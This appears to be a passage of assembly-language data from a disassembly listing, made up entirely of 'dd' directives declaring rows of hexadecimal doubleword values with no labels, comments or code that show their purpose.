dd 303B38C6h, 252A055Fh, 912F5871h, 29805CD1h, 0B6425529h
dd 7089337Ch, 0C074067Eh, 633BFC35h, 63927E57h, 4CF46286h
dd 21CB0C7Bh, 0AF12E6Eh, 9CE15CC3h, 0D4D30D45h, 8DB1F962h
dd 0B1D365D3h, 0BDBCC3B6h, 5291DD64h, 0F2774B74h, 5D5B5F38h
dd 0E673480Bh, 0AC8C48C2h, 0CCA6EADFh, 93597A0Dh, 78EE35C0h
dd 0EC25BCCCh, 0D7B9716Eh, 0A3EB5974h, 24A6E705h, 0D6DB9BACh
dd 749760FBh, 8BAB96EEh, 0F3AD879Dh, 67243A18h, 0C221A736h
dd 0D34564E9h, 4B59D68Ah, 7BA3404Dh, 3FACC12Bh, 0C8CECF98h
dd 6177F478h, 32AA1CCFh, 2474EEAFh, 0E488BDC2h, 0E8C0D0B9h
dd 180A1E6Dh, 0D98DD8BFh, 4557B891h, 5913EAACh, 0E210D482h
dd 0DE9CBC51h, 8F9F5B67h, 0E8DA5D7Fh, 5A107492h, 0DF2F2B9Fh
dd 25F85C3Dh, 8C5366DFh, 0C9EA9D18h, 0C97CF171h, 88636043h
dd 1D251272h, 1348ADB9h, 0DC6B4192h, 0B35A751Ah, 7DEAB5D6h
dd 9C7B1F88h, 0D8344345h, 9521E4CDh, 6C85BA04h, 75B0BA48h
dd 0E7F356E2h, 79DFAA3Eh, 401B4350h, 6A29367Ch, 89421AEBh
dd 6ECF5061h, 0BCE61771h, 0CED99435h, 65FC4B1Ch, 0B06D6FC7h
dd 42D3AC3Bh, 3F2B80D9h, 0EF94CACFh, 87285912h, 0E1E7C830h
dd 330D926Dh, 0DF6084BCh, 0A24684EFh, 718F8080h, 0FD1C321Ah
dd 0FED78B8Dh, 20BB85CEh, 9F485D63h, 0CE921C59h, 6D240F82h
dd 0E84672A4h, 0F37097FCh, 96A1A9C3h, 0B55813D3h, 7914342h
dd 17A97180h, 0CF06D784h, 9D7F377Dh, 8AF27D30h, 333FA7D4h
dd 0C0664025h, 0DBBE40D1h, 9AFA74BFh, 5FD86DF1h, 52E61B63h
dd 0AF81394Ch, 0B3D22442h, 0D1890522h, 0C9A36D46h, 0FD556E97h
dd 0D95BF3C6h, 0A55B1EF6h, 49D459EBh, 8AE5874Ch, 0C5EEB21Fh
dd 5C873323h, 0A3C87AF2h, 7D6DC05Fh, 8E7FA4B1h, 2E4C5C24h
dd 4340A39Bh, 0BF006F91h, 6BFB961Fh, 106DABAEh, 39C5B52Ah
dd 0D16887A0h, 0AE4AB9F7h, 0F791300Bh, 0D7094791h, 1E274E1h
dd 4D383EE1h, 54AE803h, 2883BC43h, 3D4B1BBAh, 7BF0DA93h
dd 0A0722533h, 5CC81E6Ch, 0BB473635h, 7AD3D9A9h, 55DD360h
dd 30FD684Eh, 750AD20Fh, 0ABA41D28h, 395341CDh, 36D23FB9h
dd 7E3B1D29h, 718B7723h, 4D7F427h, 14BD7709h, 334C30FBh
dd 0C0380Bh, 57E0CA2Bh, 3A476EA0h, 59A96E4Bh, 0C3C6C4F1h
dd 0E457D5A6h, 0DB77DB97h, 7AFE0705h, 0ED521345h, 7CB8C0D2h
dd 7263A462h, 0EFBE2352h, 854EC0A6h, 6D8191A9h, 0C6D7267Fh
dd 0E64E734Eh, 0E8B26C0Ah, 531525FAh, 9F4D782Bh, 12BC6756h
dd 0FD7140CCh, 5CE47565h, 1F5B1DF3h, 0CCB63C3Bh, 0C26FCFE9h
dd 0D637FECDh, 9456D56Eh, 0BCF5C014h, 0F50C1E5Bh, 56B86075h
dd 0D310E5BCh, 0A36404C1h, 48D637FCh, 0E85D1FA1h, 5825670Bh
dd 0FD6764A1h, 3E683F50h, 47DD8A12h, 956846FBh, 0CA8B8319h
dd 1DE8915Eh, 8A7FD187h, 0C07FFEB7h, 18648E7Bh, 1AB7130h
dd 0EA9D8BDDh, 23EA65E5h, 0D333C066h, 96FFEE29h, 10479A87h
dd 35540867h, 60577736h, 0E540341Bh, 861D68A1h, 0C982836Ch
dd 0F5AC317Dh, 0A0BAF064h, 122E6616h, 477FA90Dh, 35E99FEDh
dd 70D1BBAFh, 9E6B4429h, 5E2D6F02h, 3BB19296h, 9B81AE4Eh
dd 9C8E89CCh, 0DA773E1Fh, 3F2FB5E2h, 0BBFBD1D0h, 0BFAC4849h
dd 0C23F8250h, 45E344CBh, 469A39F6h, 0D3FC61B0h, 0C375D9BCh
dd 0D1DDC7B9h, 0B72843E5h, 19FAB356h, 0D821629Bh, 5F5BA718h
dd 0D4671E7Ch, 908703C7h, 0C2358FC9h, 5EF4B9D1h, 921BF102h
dd 85A57686h, 886B9825h, 0C1046B51h, 859BAA5Ch, 0D9EE8F4Eh
dd 519E75EFh, 3406695Eh, 0AE52F28Ah, 65B28802h, 0D23E977h
dd 82910D56h, 0D04ED9E6h, 0D0ABB5C2h, 4D8D023Eh, 1092FC5Ch
dd 51605C4Dh, 3746A651h, 79EF7E4Fh, 38F9AAEAh, 4463C66Eh
dd 0BC02BB44h, 408D1363h, 3CB34EB1h, 92D04EA0h, 0B8047496h
dd 7115C9E9h, 72225B72h, 0EE1A4539h, 365F0C69h, 0DC3EE3F5h
dd 5162C31h, 2E7FCA59h, 88E7DD45h, 0E808AEBFh, 2FBB6463h
dd 0CC830335h, 53943805h, 0E3559E1Eh, 24B13B16h, 88404A9Eh
dd 0EF17B41Fh, 0B6E5D326h, 0B7946334h, 91B0FFE3h, 0CA3D5F8Bh
dd 45622142h, 0EB529FAEh, 0A001DED9h, 6696A84Fh, 487CEE66h
dd 0F2C6D4E7h, 9424CBBh, 0C4B1ADBCh, 1335D752h, 57D99B99h
dd 67AA282Bh, 0FE7A3A4Bh, 0FFAFB8Fh, 0B527C4E5h, 0EEB8D32h
dd 39CF4E6h, 0AFCF1215h, 0AB9AAB0Dh, 0AEE74501h, 389462DDh
dd 0C76759A3h, 914FC3C8h, 0B9F83265h, 7052C137h, 44E410F7h
dd 0F99CE31Ah, 9B5E45F9h, 0C06BAA9Bh, 7BC1C8AAh, 40C9C1F8h
dd 0EF611F6Bh, 0CA17395Ah, 1BC030B7h, 0A13089E7h, 3B7FEB59h
dd 0ABF43467h, 0C5185B6Ah, 0CDB050F8h, 896E6613h, 9BFE20B6h
dd 0DB2E580Ch, 6378D2F8h, 1E317632h, 12C4D1DDh, 3B55C9C7h
dd 3D47EE7Eh, 65EF3CF5h, 27C5220Ch, 0BE8C21BCh, 90EFB9E3h
dd 0D07D364Ah, 0D01EF277h, 0A1A91931h, 37CE7E71h, 1261F4CDh
dd 7C1AE868h, 8C946E6Ah, 0EB4FD237h, 0EA9BE95Bh, 0B0F12FA6h
dd 0B10582DEh, 997CF672h, 0EC2B1C20h, 93835E10h, 36D0988Bh
dd 2A355F31h, 0B12E7AE4h, 0F06922A3h, 3BA523D8h, 3F32E953h
dd 0D6338676h, 1CCEA25Eh, 143BA31Dh, 37634B3Fh, 18F4FC3Dh
dd 0A6973CF8h, 0E1E1D4DCh, 4D2A93B0h, 0C04008D3h, 0EC1619ACh
dd 0D62F0CFBh, 6D252B05h, 1AD1EF15h, 7DB7D74Eh, 73118160h
dd 46240579h, 0D45D7B73h, 0C8CF96h, 14FAA45h, 7CADE5F0h
dd 0E87A8D83h, 49A7BAA1h, 0F87AAD65h, 2EBC503Fh, 8959ACDEh
dd 643CFF90h, 4DAC167Eh, 1DC5740Ah, 3018661Eh, 58098248h
dd 2DDB7075h, 0E5E4ED69h, 7DEA1B37h, 0D6E8EB6Bh, 0F0F34789h
dd 27BD2116h, 9BE85833h, 37422037h, 0C364A24h, 0F9662ED2h
dd 42823D11h, 504F1B6Bh, 8EA896FCh, 80E44008h, 0C87FC090h
dd 352378Eh, 6C7845C4h, 0E2CCDC3Ch, 0F8295402h, 0CB645C1Bh
dd 0B7BD0284h, 0CB45EDD7h, 0F89C86C4h, 674324BBh, 35E9DC7Ah
dd 0EC5639A8h, 0FD0441Eh, 184851A7h, 14290401h, 0F9620321h
dd 0F0D4A07h, 0EB2A780Bh, 7B684360h, 0EA51EFD9h, 399FFBEEh
dd 80A788EDh, 44E36575h, 0DE4FACFBh, 59C6C30Fh, 946761BAh
dd 71F406B2h, 91609F35h, 81AF345Ah, 0B7729773h, 0E951FD41h
dd 6290F44Dh, 622B0DBBh, 91E9D398h, 5D92675Dh, 64F0CE76h
dd 0A38559Bh, 0BDEF1A78h, 225405DDh, 1EB5A62h, 43C2EA5h
dd 0F1B8E96Ah, 359CF05Bh, 0AE06AF28h, 99D805F3h, 848363B9h
dd 0B08546B5h, 45AC2C41h, 4574A924h, 7A5F338Ah, 0AB82F55Fh
dd 8FABE23Fh, 3D1D17EBh, 991D7BD2h, 0CE1B9F7h, 0D0606BD7h
dd 0D6C80A42h, 4AE4AA6Fh, 0E2136DF6h, 0E36DBAA4h, 6AC5C7E7h
dd 9E2B6F37h, 22174931h, 0D2EBE327h, 48AFC23Bh, 7F8558E1h
dd 36F9BCCBh, 0ECE3D90Ch, 0C4BCFC8Ch, 741B7D16h, 57EB4215h
dd 3255E2A9h, 0C0CD2610h, 602724FEh, 4132DB4Fh, 0E9DACF06h
dd 5B2EA5D2h, 40F7B788h, 83600CF0h, 313CFF56h, 0C5DF14BDh
dd 8CFA74B8h, 85D47626h, 0FC2989A3h, 0AFF6556h, 0EF01821h
dd 81B34B0h, 0A1948896h, 94DE611Ah, 81FFDE77h, 0EA341593h
dd 50DE2D5Ah, 0A587BF34h, 0D7EA21FBh, 6D2537E3h, 8A573C1h
dd 9159885Bh, 0F607F96Ah, 5F61B341h, 522FC2F0h, 0CC82F58Ch
dd 0D6B118F4h, 59764E40h, 9EC0CEBAh, 3D804C86h, 0E92F21A2h
dd 0B900EB03h, 2373B9A1h, 0FC9395E9h, 0BD2D2FA3h, 0ED8602BAh
dd 0E00B243Fh, 6611A45Dh
dd 0BF70CE1Bh, 0BCCE20Dh, 5F4A44C4h, 6A4B1F6Ch, 16DA314Bh
dd 49BF7DF6h, 0BC2E0A1Dh, 0E3E47E7Bh, 624D9D09h, 22AC6A6Ah
dd 7F966C2Ah, 0DC78AAE9h, 0ACCFAC88h, 94E79D8Bh, 9B2FA745h
dd 23F71D8Ah, 715A3790h, 2DD116EAh, 50125A63h, 4C728A8Dh
dd 6EEC19FFh, 5EC5F624h, 0E4FBA8B7h, 0B8F67F6Dh, 5A6DA592h
dd 0F3865D05h, 8B135C1Dh, 7F058367h, 34E2D182h, 0B53B1129h
dd 4234FD4Bh, 5F4E2CD9h, 6865EBF1h, 3B467C04h, 0E4490EF2h
dd 0B255D5F1h, 0B5EDE21Eh, 9185C61Ch, 0F86F830Fh, 0D7A38B66h
dd 422F13EEh, 3DCDDE9Ah, 0B9038E95h, 2EE34E63h, 0F9A3CCDEh
dd 0F9A43E0Ch, 6D0917ACh, 3B6BF64Fh, 1CE50E92h, 87AC5973h
dd 0F88FFA5Ah, 0D71EA6DCh, 6A3B6ACBh, 18B7DB83h, 968E8F62h
dd 31F75262h, 9E6FB02Dh, 99B5859Ah, 0E70577DAh, 4AE036F7h
dd 65B0A32Bh, 1A7DF2C2h, 64387372h, 4EDBE5F7h, 4C5262ADh
dd 5357AD04h, 9D3135F2h, 6B2CDA11h, 0BBA636E1h, 4D8F1437h
dd 878932CFh, 65924C4Fh, 66852767h, 6491C68Ah, 66E7D1C5h
dd 9F293942h, 6E81FC92h, 0D8376A63h, 0E86684BDh, 955D8F16h
dd 0B256194Ah, 734A2E4Eh, 0A863A346h, 2AB0FFB6h, 896266F6h
dd 0E905177Ah, 33EA23Ch, 9261B073h, 4A26B9F7h, 0F9849F4Eh
dd 0FE3FE47Bh, 0CB80FFB2h, 68A0E4F8h, 1E31A837h, 0CB672B3Eh
dd 6603E452h, 0DF941852h, 223B13AEh, 0EBF2FF0Bh, 470128B4h
dd 0B21B5300h, 0BC225240h, 4159726Dh, 0C926677Eh, 0A1C47F2Ch
dd 46966B4Dh, 8299348Fh, 23547755h, 27EF5ED8h, 0E036C2D7h
dd 3B3596EAh, 0E4E847Ch, 6CBD4C74h, 367C57E5h, 8EC3D068h
dd 0B54D9F55h, 0D455017Ah, 0B0A04EFEh, 41FCE18h, 2E983044h
dd 0B4818358h, 700ED690h, 1D3D5455h, 8DF2E6F1h, 797F2FE6h
dd 7F8D4B29h, 57F785B2h, 59E7029Ah, 14C7775h, 87BC738Fh
dd 351BEC3h, 824F9F62h, 0D665903Dh, 0FE9C2E7Fh, 55FC083Ah
dd 6C9CADD1h, 0C53D4987h, 9D91E141h, 55311E4Eh, 0D4BE2F73h
dd 0D79C94B0h, 0CC77B6EAh, 6C394717h, 0F44BA859h, 33C4FA5Ch
dd 2237FFADh, 0D0F3BFA6h, 5C91DA77h, 0E4E8D7h, 0F6AB53FEh
dd 0E4EF981h, 55FDCD26h, 0D35B87E6h, 0A712FCCBh, 312B6F92h
dd 0E5B0F9CEh, 0FF51465Ch, 0FFF9DFB7h, 18E4411Eh, 53D17305h
dd 746B9350h, 0F32A755Ch, 99D46746h, 0C3BCD3Eh, 33107301h
dd 4053997Fh, 71A5EAB2h, 7469DD7Bh, 34FA2E99h, 7E168FD6h
dd 0AEFD131Dh, 78504916h, 8E69C970h, 0F7BD1063h, 4E3008B0h
dd 0FEF56696h, 0D2306615h, 10E8E490h, 8341A2B3h, 0C65C2A91h
dd 13A62D16h, 4FFD1504h, 0D938BAAAh, 0F192E013h, 0B826BAC5h
dd 4DE6B30Fh, 0FC36AB87h, 52BA206Bh, 56487D2Ch, 0A55C856Dh
dd 0E0AF5373h, 7E39F19Fh, 0CCBA19E4h, 0A44BC81Eh, 4B4179B7h
dd 3CBEE1D5h, 5548138Eh, 9A068375h, 9AAF9B3Fh, 78C60893h
dd 6232511Ah, 7854B93h, 77A3AB68h, 0D4F4A04h, 70843891h
dd 368AB072h, 9AFD0B7Eh, 1B375DECh, 0A1111355h, 0B07BC3E2h
dd 7B0A5FB6h, 0CECA0384h, 3D1F1464h, 588603Ch, 0C3321BCCh
dd 55DBA57Ch, 9AF1410Fh, 0AC24A705h, 4C814BFFh, 0FEC3CE6Ah
dd 0BD9ECCA8h, 54D1C107h, 0D43D7649h, 420BBD98h, 4F97009h
dd 0F2838634h, 4531ACDDh, 48E7989Ah, 0EE973434h, 2BF05105h
dd 763E4F82h, 0D41534BCh, 0AAB8BACCh, 0A16F69A8h, 126C9AADh
dd 83344403h, 987AC4C0h, 8BDADE8Fh, 0B9186F9Bh, 0C88FB378h
dd 0E6050645h, 0A2333A26h, 24653CACh, 0C35CAC14h, 216B4C31h
dd 796FA21Ch, 206CF806h, 0C92F3ADh, 1EEEF593h, 36DF88B9h
dd 3629C51h, 8CA64B07h, 2787C85Bh, 34769CF4h, 1452D2E1h
dd 79A8052Bh, 0CCDEDD4Fh, 0AA35EDCEh, 0B117442Bh, 932C7DD3h
dd 3B25AD53h, 83F0626Ch, 0C317332h, 30B4D3EDh, 0B1B820E6h
dd 0F80046B2h, 1C9CDDA4h, 0C08A30DFh, 2A4AB8E6h, 8BA9EF11h
dd 0E9EDD61Ah, 65D62F49h, 28CCAB74h, 0A86E06F3h, 873FB7DEh
dd 0B741DF6Ch, 0F0392A61h, 0A5A0737h, 0B2687B1Ah, 17560776h
dd 0EC2D8BEEh, 0DB7D44C3h, 553766F0h, 0AA7378A4h, 21E915ABh
dd 0FBC3AF88h, 9C90F5E1h, 0DFE4EE78h, 4765E547h, 0ADBFC5Dh
dd 0C995EA90h, 0FA8120DFh, 92BF2BADh, 9669A775h, 0A467D973h
dd 2BA8096Fh, 6E313437h, 0FE358D6Bh, 9DE4952Ch, 0E28A5B18h
dd 79D89493h, 0D9244117h, 75BCFF10h, 881ABABCh, 0EE340471h
dd 5AF32EFCh, 441D8400h, 0C9A00C64h, 63041828h, 0ED662DC8h
dd 483A4245h, 0CC7C4350h, 52432EDDh, 0C7B7BDCBh, 0FD4C504Ah
dd 585FDE63h, 0D14CC07Bh, 0E03C2DF4h, 80E8E79Eh, 32EE4375h
dd 46445C01h, 84D354DDh, 9428BE1Ah, 2E51C56Dh, 0CEC626AAh
dd 0CCE96C63h, 36446096h, 7BF07D5Fh, 927476ABh, 84B28B40h
dd 864A47B8h, 0A4B9A1B5h, 5267F669h, 5E05E509h, 3D7B022Eh
dd 0F9A8E653h, 6CE0F0CFh, 0B46CA080h, 0E921C5B8h, 8A6FC0B4h
dd 0C122777Dh, 272A132Fh, 1FCAED3Bh, 661F6BCh, 5F7E2C41h
dd 8DF4D92Dh, 0AD4BA6ADh, 4C369662h, 0FC0F8BCFh, 67ED1956h
dd 0BE0BEC9Bh, 0C6F44380h, 1B805AC3h, 55E90CD2h, 6AB3189Bh
dd 71C6F1D4h, 0DBBBDAA4h, 9F0D0D6Fh, 0AE0743CDh, 7C578540h
dd 3BCBDE4Fh, 50981716h, 0A4937FEEh, 0F7B378D0h, 0C9D28AB0h
dd 640A30CCh, 50C3EB88h, 97EA4436h, 4F1B6680h, 5020C6BFh
dd 0AF9EB03Ah, 437A03D2h, 0BB9142E0h, 0EA352E80h, 0C0D1F6Dh
dd 4110113Bh, 0F875F675h, 9E984E8Ah, 714D941Bh, 0D661D87Ah
dd 9BB9538Dh, 0CB765AD8h, 6844EB61h, 4928823Ch, 7E32D101h
dd 2D99B055h, 0AD6B32FAh, 19B68F90h, 66E23D73h, 8EC64FF9h
dd 0EABD893Bh, 9F5418E3h, 60D7AF34h, 0F78839ECh, 55F75D6Fh
dd 0ADDC4B5Dh, 0AE6D1F95h, 93773588h, 0DAFFBB2Ah, 6B2A5E5Bh
dd 0B172519Fh, 79689985h, 0DD3AF527h, 9B8B65B5h, 14765846h
dd 72249B64h, 0DB13916Ah, 9F392638h, 411F39C8h, 0A5B04E85h
dd 0A2303485h, 54CA8780h, 9014B8CFh, 9D16E479h, 28A66B6Eh
dd 87DF273Eh, 34436C0Dh, 4DD78DD0h, 6C6D2924h, 67E0BCADh
dd 0E0B3D084h, 97FAFB02h, 0E30CB9AEh, 7A7C52A2h, 0FFA6722h
dd 53313B96h, 6A7EC047h, 0A33F99EAh, 0AE243F42h, 8CBD24DFh
dd 80DF2BDh, 0C10AE231h, 4F4E0157h, 7D5288B8h, 74582ACDh
dd 9B0FA726h, 0CE863B45h, 241AC331h, 0DC2091DAh, 5D51C8D2h
dd 4BD4224Dh, 952F75Bh, 4AE124D3h, 0F790FAE3h, 9D0543FEh
dd 0DB349B90h, 6C7A4CD1h, 0B6C5B3C1h, 54CF3823h, 2AFF8AE5h
dd 8E76A8AEh, 62DF8C56h, 0A075CC0Ch, 0F5C06031h, 0F9B5E9F6h
dd 0FBBF93C1h, 790CA250h, 6D30B147h, 0BB1F75B6h, 76155811h
dd 0A014CA7Ch, 83CA02D6h, 68ACA760h, 0A011B96Dh, 927E1BE7h
dd 0F78664Eh, 0C684D222h, 0D54CAA43h, 5ED7899Eh, 40057761h
dd 419CB57Dh, 1B31B200h, 0D9A2B762h, 78857E06h, 0E3973D63h
dd 375424CBh, 93C1EFB6h, 0E8BB3284h, 61129407h, 0AABB5764h
dd 3D654397h, 9B02A18Fh, 7378A5BFh, 4D45847Fh, 0B93B477Eh
dd 7133D4ACh, 551F4635h, 80F3EC30h, 0F75C62Fh, 0C8CED8ABh
dd 0BF636EA5h, 31E6A34Dh, 477C9B6Eh, 0F35B58F1h, 2CD6BD61h
dd 557E9CA6h, 6CD8C30Fh, 6EE4F7F6h, 0C56024EDh, 940A48Ah
dd 0FDDB2F5Bh, 0C1C4AE48h, 0DA838D37h, 7DA7B42Eh, 0FADD94D8h
dd 17A47F2Ch, 11C9DC8Eh, 0C94C0FC0h, 0A22944B6h, 789E6D2Fh
dd 4932E7DFh, 367B2746h
dd 31FFA902h, 0ED5138D3h, 0DF83E9B6h, 2B399B30h, 0F95A817Ah
dd 5F48A6DAh, 0DB1BCE50h, 5B184047h, 1AB33BCh, 0AAF145A3h
dd 98B1186h, 0C6120234h, 87BE6A31h, 0D6F7CD49h, 0BE8C11DBh
dd 291A1727h, 0B2D9490Dh, 0C3CB15CAh, 0E3E9BAD0h, 15BAA986h
dd 20086869h, 0DB6C6B88h, 4428CAFEh, 70001884h, 0E390D7C7h
dd 1982D078h, 507658F9h, 4C785643h, 90B34D84h, 0CCD1286Ah
dd 0E4B3B4E6h, 83BAAECAh, 8FAF5CB5h, 1B438A8Fh, 5501A5B1h
dd 43638B1Ch, 55636BF8h, 0F4507DDAh, 0E4AC71ACh, 65A6E65Ah
dd 44553B90h, 6D9E8F4Ch, 70B436C5h, 5B4DAB11h, 8EE0FB9Ah
dd 0C9EB8F3Bh, 0C51C8D5h, 0F8DB6AE4h, 5F4F7132h, 446F3CFFh
dd 0BCD09586h, 0BD5899EAh, 65AC656Dh, 19C0BA0Dh, 0C91DEFA2h
dd 7AB0B700h, 0B952E837h, 8E20EF24h, 38EA7EC0h, 0A3C7A2D4h
dd 9F1BA2F4h, 66D69D3Eh, 9FF9C702h, 7C561637h, 0E3F3EB96h
dd 0C3DD0D75h, 0F0FB1AB7h, 0C3624A20h, 0B9B3510Bh, 3148D0h
dd 5F527EA9h, 7EB650C1h, 5FB73152h, 309F9DF2h, 20D23077h
dd 0DB1897F1h, 34C1D970h, 427DD495h, 4DE31320h, 1C54CE16h
dd 0CB3026A3h, 37E0B69Bh, 718CEDB2h, 98BE2300h, 0D7EF89ABh
dd 482575FBh, 0CA7D71BAh, 81A651BDh, 0C646E27Bh, 5A5221F5h
dd 657C3DBAh, 0D775F2F9h, 0FC0B7E83h, 0C6A4E30Ch, 0EA7FE21Fh
dd 0D38A52E2h, 0DBF2DC80h, 973F22Fh, 3D3C3B2h, 0C923DA7Bh
dd 0EACEE1FDh, 0F5B509F3h, 0E4181913h, 0DC93208h, 7F822DC8h
dd 90DFB357h, 0F1F2BB3Bh, 24626B5Eh, 0D9115EC7h, 0C5E19911h
dd 0EDD58961h, 2E571EFBh, 13E42396h, 0FE0CB831h, 0C44968E7h
dd 888BFE1Eh, 3D0CF0E3h, 0A21E83C6h, 68506983h, 946E761Bh
dd 148B280Eh, 0E518C994h, 0D97E6CF5h, 11BC2BD4h, 97E1A425h
dd 0BEB35197h, 0A780E6D8h, 0C5FA0D09h, 0D2FAE1D7h, 8FD69E2Ch
dd 3F3F6292h, 80E43117h, 4E4BFA89h, 9BB3D1CDh, 1A774FD6h
dd 937C9CDAh, 0A79E8307h, 36024DE0h, 9D5A9CC4h, 273C93B2h
dd 0F6A1E3A5h, 5811B093h, 0B264AB8Eh, 71927399h, 3EB4B245h
dd 0BF7D5ACDh, 47F8C500h, 0BE7C1EB1h, 92185F30h, 8A4ED517h
dd 0FF5A026Bh, 0AFE5EFB5h, 6A2E5FFDh, 9302AFC0h, 17DC1066h
dd 3D2355D7h, 6A6738D5h, 0F9E91C06h, 7451CF35h, 3DBA4BEFh
dd 89CFCAE9h, 0B893856Ah, 596D3BA0h, 93A3218Ch, 0D3F54159h
dd 0E0425409h, 0C2D9169h, 0DB74EA2Fh, 7EDD4CE6h, 79AA4421h
dd 0EEF92E41h, 44B23012h, 820EB17Dh, 0FFEA53ACh, 5F4C4D49h
dd 0A62F258Eh, 50052C7h, 62199D62h, 6770CABEh, 628C1130h
dd 3CA435CAh, 9FBA4DA8h, 216AF463h, 2E56CFA4h, 959C1EFCh
dd 467CCFADh, 2C48DF4Eh, 0AD1179A7h, 494BA3C4h, 0DC33E8CAh
dd 2A11B654h, 0C1D3C174h, 295A20A2h, 14490547h, 510E80A2h
dd 0EDEDB734h, 0C75FF798h, 542915DEh, 0A601541Fh, 30396E9Ah
dd 0C3D0E0E6h, 18791F6Eh, 97EB8C78h, 0ED2C08E8h, 0CC8D0BA6h
dd 5D8A3120h, 5A91713Eh, 68597FABh, 87375CA9h, 9339FD71h
dd 3C122B7Eh, 7AB259D6h, 0FB3F8326h, 93A9F448h, 0A31A41Ch
dd 0F593926h, 0F0C29CF6h, 9E3A78A5h, 0DA5147B0h, 885B2579h
dd 15B085CEh, 0A253A20Dh, 1B8CDBA9h, 98761383h, 0EEFFCDE3h
dd 0BA68186Eh, 9E2EEB5Bh, 22800EA0h, 44828BDAh, 11195E7Eh
dd 377DDA4Ah, 3034928Fh, 374451E0h, 0F105349Dh, 0D680BF17h
dd 469FB051h, 52B7ED60h, 714B1F30h, 540B02EDh, 1B703B7Ah
dd 0F4E0F9D0h, 0C3BA8C08h, 3CCA6930h, 67A0E8EBh, 5EC8DFB9h
dd 779BC5D5h, 5CF94C57h, 4A337BB7h, 0A7A8A116h, 17BC13EEh
dd 0CA97AB4Eh, 701E07Bh, 39EE29A9h, 2D9C6DF7h, 311DAED3h
dd 9B87B9CFh, 69A1AC05h, 6244580Fh, 8AF56B56h, 0BEF63CA3h
dd 650A5861h, 3E9EA654h, 2ED2901Ch, 77C388h, 4EC92C8Dh
dd 0BE84458Eh, 0E4B71B46h, 0B1392D01h, 770B5F3h, 872AD726h
dd 3639B2A0h, 87AD1DCAh, 32955FCAh, 0CA4AE976h, 38E67845h
dd 0B8D667E0h, 0BD0FA8F7h, 92187D01h, 7A2B3D4Dh, 3AADC71h
dd 8FA28FBFh, 0F2EEF713h, 3FB1987h, 3A13BB39h, 70D3A0AEh
dd 14D75523h, 174B7601h, 0B6E684C9h, 0FF4FBB87h, 0E9D8ADE0h
dd 0C252B871h, 6816840Fh, 0DFF21B3h, 0E8A0F767h, 62A94E6Fh
dd 0FAB42B3Bh, 3B126612h, 7FAD669Dh, 0F588C537h, 5599490Eh
dd 0B4049661h, 9E878226h, 56B45280h, 0C71116A4h, 84BC8A5h
dd 33691C11h, 20BB0680h, 82BDCB8Ch, 8664139Ch, 4A643240h
dd 503E6A52h, 557ED5D7h, 0EDFC4B38h, 396F28Dh, 0E2F3CF71h
dd 5A0A8DCCh, 9D94637Dh, 0F587CA49h, 0FFE457D9h, 40F5EA00h
dd 5C765983h, 9A593BCAh, 0A6E78E7Ch, 0CF6331BEh, 66634B81h
dd 0A792B4FCh, 10DBAC90h, 3AD3E2AAh, 17189D63h, 1AB7CA53h
dd 0CB687CBh, 468E4F24h, 919DC796h, 53B09A42h, 54BC80D6h
dd 0F38CA68Fh, 0CF673AFh, 0EC3B51CEh, 92537CE9h, 3ACE48BAh
dd 856BBD6Eh, 421273AFh, 0CD6896BCh, 3416113Dh, 6DE8FE33h
dd 0C0D83280h, 6BE01547h, 0B2D3624Bh, 0E90099E0h, 0D217E58Ah
dd 3D1DEF86h, 0DA2F6233h, 0B4DDC85h, 7FC87552h, 3EA2DD2Bh
dd 9B5BE246h, 7993D82Fh, 496EB2E6h, 5D20B5AFh, 6DED9302h
dd 738EA226h, 9236AD38h, 0E57B20A8h, 4E2CE01Ch, 21BFD8Eh
dd 0B2D68418h, 5E2CDABBh, 2E716E7Fh, 9105275Ch, 0E883924Fh
dd 0C8DF6B5Ch, 94AD7C73h, 5172649Bh, 2D017F27h, 8153C1A2h
dd 0CC56BC2Eh, 0A14137E1h, 672844B6h, 0CEC93BE9h, 0E6FE6974h
dd 0AC7B4F06h, 1995EBE8h, 0D9F107A5h, 8E980D10h, 0D4AFF43Bh
dd 0B5D41C37h, 0C50B82C2h, 0D4811E00h, 171B92E8h, 80F754FFh
dd 0F08F61A6h, 0EEF3C228h, 1BF4BCC3h, 0FDACEBAAh, 2BCA4DC9h
dd 12ABB4C6h, 9E198CA6h, 2098C67Ah, 405E25AEh, 0AC38BC05h
dd 0F76AB655h, 84064F0Eh, 0D4D1B0E0h, 45EB1B6Ch, 3B4F7377h
dd 3F8777E2h, 1F21B408h, 28F9B2F6h, 7E41675Fh, 0F60883E4h
dd 32542D7Bh, 0DB0323B1h, 450B1003h, 14D236ECh, 8CE7EC4Dh
dd 92962E92h, 0B4D2976Fh, 551A4F16h, 831F3B34h, 0F6910444h
dd 0B68B158Ah, 18011035h, 1D19DFE3h, 5BBD8087h, 5DC3A8CCh
dd 883AA2F2h, 0C3D0E37Ch, 0B6F63C72h, 6366988h, 0F2253552h
dd 1FF9CF34h, 1BB754C4h, 7C375754h, 0EE1E494Ch, 72DDBC52h
dd 486C302Ah, 0DE37E38Ch, 0C22F2699h, 0C8B2B2C7h, 866A744Eh
dd 869A90AAh, 265F4ADBh, 3EB0D20Eh, 8317A1E5h, 0D63F3A64h
dd 70F149B0h, 0B071ED47h, 646E36D3h, 8C4FEAF9h, 2A3CF09Ah
dd 0E1AD620Ah, 0E81D32D5h, 1D22FE00h, 9F5253D4h, 9E8C1409h
dd 51CFE118h, 212FEB04h, 55B9BF82h, 0A7CBAFFCh, 0C469726Bh
dd 1559FF67h, 0E7FE3F33h, 0AD559A42h, 40F8EDDFh, 34973051h
dd 40FE2FF9h, 1EE223BFh, 0BA391CB6h, 8B640383h, 0A0DAE1BAh
dd 5C73EAACh, 8504B8D9h, 28BD7189h, 64DCDC25h, 1290DFF1h
dd 22BAF518h, 4EA3A65Fh, 2D18B021h, 0C79FBDEBh, 15123490h
dd 0F0C380E5h, 92985FE2h, 65698F3Bh, 0DCE43856h, 0A42482BCh
dd 6CA10099h, 0D97DADC3h, 0C55D7D3Fh, 1B0FECE1h, 6909D660h
dd 7FC2B384h, 0FEDC716Ch, 932FC28Eh, 56C0E363h, 58238CDFh
dd 0EC463D18h, 0EE97B5Bh, 0BF8EACF1h, 0E8DF101Dh, 0D87837AFh
dd 0E1949824h, 0CD7C4DCAh, 9A62D9DEh, 3C43E9C6h, 9C93B239h
dd 0AE573CD0h, 0A86D4A96h, 0D7A17637h, 590734B6h, 0C924A2AFh
dd 0B838E2D0h, 0EB4963E9h
dd 0D482C981h, 0B803A701h, 2C5A9296h, 0B98924CAh, 63404D8Ch
dd 28EDE446h, 0E4AFA761h, 9643D36h, 13BBC55h, 21344E5Fh
